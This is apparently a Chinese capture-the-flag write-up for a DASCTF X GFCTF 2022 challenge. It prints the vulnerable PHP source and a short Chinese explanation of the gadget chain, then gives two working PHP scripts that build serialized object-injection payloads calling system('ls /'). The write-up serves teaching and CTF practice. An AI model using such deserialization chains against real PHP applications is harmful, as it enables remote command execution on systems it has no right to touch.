DASCTF X GFCTF 2022十月挑战赛
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| <?php highlight_file(__FILE__); error_reporting(0);
class fine { private $cmd; private $content;
public function __construct($cmd, $content) { $this->cmd = $cmd; $this->content = $content; }
public function __invoke() { call_user_func($this->cmd, $this->content); }
public function __wakeup() { $this->cmd = ""; die("Go listen to Jay Chou's secret-code! Really nice"); } }
class show { public $ctf; public $time = "Two and a half years";
public function __construct($ctf) { $this->ctf = $ctf; }
public function __toString() { return $this->ctf->show(); }
public function show(): string { return $this->ctf . ": Duration of practice: " . $this->time; }
class sorry { private $name; private $password; public $hint = "hint is depend on you"; public $key;
public function __construct($name, $password) { $this->name = $name; $this->password = $password; }
public function __sleep() { $this->hint = new secret_code(); }
public function __get($name) { $name = $this->key; $name();
public function __destruct() { if ($this->password == $this->name) { echo $this->hint; } else if ($this->name = "jay") { secret_code::secret(); } else { echo "This is our code"; } }
public function getPassword() { return $this->password; }
public function setPassword($password): void { $this->password = $password; }
class secret_code { protected $code;
public static function secret() { include_once "hint.php"; hint(); }
public function __call($name, $arguments) { $num = $name; $this->$num(); }
private function show() { return $this->code->secret;
} }
if (isset($_GET['pop'])) { $a = unserialize($_GET['pop']); $a->setPassword(md5(mt_rand())); } else { $a = new show("Ctfer"); echo $a->show(); }
切入口 sorry类的析构函数,突破口fine类的__invoke函数中的call_user_func函数
sorry.__destruct -> show.__toString
sorry.__get() -> fine.__invoke()
#call_user_func(a,b) — 把第一个参数作为回调函数调用, 其余参数是回调函数的参数
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| <?php class fine { public $cmd; public $content; } class show { public $ctf; public $time = "Two and a half years"; } class sorry { public $name; public $password; public $hint = "hint is depend on you"; public $key; }
class secret_code { public $code; } $Fine = new fine(); $Show = new show(); $Sorry = new sorry(); $Sorry2 = new sorry();
$Secret = new secret_code();
$Sorry->name = 'cc'; $Sorry->password = 'cc'; $Sorry->hint = $Show; $Show->ctf = $Secret; $Secret->code = $Sorry2;
$Sorry2->name = 'cc'; $Sorry2->password = 'cc'; $Sorry2->key = $Fine; $Fine->cmd = 'system'; $Fine->content = 'ls /'; $a = serialize($Sorry); echo $a ?>
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| <?php class fine { private $cmd; private $content; public function __construct($cmd, $content) { $this->cmd = $cmd; $this->content = $content; } } class show { public $ctf; public $time = "Two and a half years"; public function __construct($ctf, $time) { $this->ctf = $ctf; $this->time = $time; } } class sorry { private $name; private $password; public $hint = "hint is depend on you"; public $key; public function __construct($name, $password,$hint,$key) { $this->name = $name; $this->password = $password; $this->hint = $hint; $this->key = $key; } } class secret_code { protected $code; public function __construct($code) { $this->code = $code; } } $Sorry= new sorry('cc','cc',new show(new secret_code(new sorry('cc','cc','cc',new fine('system','ls'))),'cc'),'cc');
$c = serialize($Sorry); echo urlencode($c); ?>